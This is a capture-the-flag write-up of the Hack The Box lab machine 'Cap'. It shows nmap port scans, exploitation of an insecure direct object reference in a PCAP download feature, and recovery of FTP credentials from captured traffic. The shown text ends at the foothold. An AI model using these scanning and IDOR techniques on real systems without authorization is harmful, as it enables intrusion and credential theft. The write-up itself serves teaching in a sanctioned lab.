17 January 2025

HTB - Machine 'Cap'

by Jacob Huggins

Summary

HTB Cap is ranked as an easy difficulty Linux machine running a web server with an insecure direct object reference vulnerability, the site has PCAP collection functionality, which also allows downloading of previous PCAPs stored on the server. Reviewing previous PCAPs reveals user credentials with SSH access. With the foothold gained, privileges are escalated through excessive permissions configured for the python3.8 binary.

Machine Information

Name	Info
Machine Name	Cap
Difficulty	Easy
OS	Linux
Target IP	10.10.10.245
Retire Date	02 Oct 2021

Recon

Configure my environment variable $ip to the target

ip=10.10.10.245

NMAP

Set the env var $ports to open ports found on the machine, scanning the top 1000. I can expand this to all ports at the cost of time if I don’t find anything useful.

ports=$(nmap $ip -Pn -T5 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

Deeper nmap scan against identified ports

nmap -p $ports -sS -sV -sC -T5 -Pn $ip

Scan Output

I usually start by looking at open webservers, so let’s start there.

HTTP

nmap shows port 80 is open and running a gunicorn web server, browsing to http://10.10.10.245 I am presented with a dashboard.

Web Dashboard

Exploration of the menu reveals an option to take packet captures for 5 seconds and allows downloading for analysis.

Web PCAP

After executing a few PCAPs, I notice the URL is incrementing in ID

Web PCAP

The first PCAP I ran had the ID of 1, trying to change this to 0 reveals a PCAP with data that is not mine.

IDOR

This is an Insecure Direct Object Reference (IDOR) vulnerability

Foothold

Downloading and opening the PCAP file for exploration reveals FTP traffic. Following the FTP TCP stream in the packet capture reveals the credentials used to authenticate as the traffic is not encrypted.

FTP PCAP